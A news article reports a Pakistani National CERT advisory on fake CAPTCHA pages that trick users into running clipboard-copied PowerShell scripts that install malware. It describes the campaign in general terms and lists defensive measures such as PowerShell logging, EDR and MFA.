Islamabad, Oct 25: NCERT Warns Fake CAPTCHA Pages Exploit PowerShell Vulnerability to Hack Windows Systems
A cybersecurity advisory has been released by the National Computer Emergency Response Team (National CERT) alerting users to a new malware campaign that uses phony CAPTCHA verification sites to trick users.
Dubbed “Fake CAPTCHA Pages Leveraging PowerShell for Malware Delivery,” the advisory details how cybercriminals are exploiting social engineering techniques to trick users into compromising their systems. The attack has already targeted users within the region, with a specific focus on those seeking free online content.
The advice claims that threat actors trick users into visiting malicious websites that pose as free media platforms and ask them to complete a CAPTCHA verification. Users are deceived into running a malicious script that is transferred to their clipboard after interacting with the bogus CAPTCHA.
The attack mainly uses PowerShell to infect the victim’s computer with further malware. Tools for information theft and network scanners that enable additional exploitation may be included in this malware.
When users are sent to phony CAPTCHA pages that imitate authentic verification procedures, the attack starts. Users unintentionally run malicious PowerShell scripts that download and run malicious files from an attacker’s server when they interact with the CAPTCHA. The advice advises enterprises to keep an eye out for and promptly block a number of malicious URLs and file hashes that are key indicators of compromise (IOCs).
The National CERT claims that this effort gives attackers the ability to install other kinds of malware, including network scanners and infostealers, which facilitate lateral movement within compromised networks. Because malicious PowerShell instructions can get past conventional security protections, it is imperative that businesses put in place stronger security measures including thorough PowerShell logging and strong endpoint protection.
A number of urgent preventive measures are suggested by the National CERT, including warning users about the dangers of social engineering techniques, especially those that involve copying and pasting unfamiliar commands. Organizations should also enable PowerShell logging to identify unwanted activities and keep an eye on network traffic for any unusual connections.
To reduce the risk of these attacks, the advice recommends deploying endpoint detection and response (EDR) systems, limiting privileged access, and putting multi-factor authentication (MFA) into place. In order to stop additional compromise, organizations are also advised to block all malicious domains and URLs that have been identified.
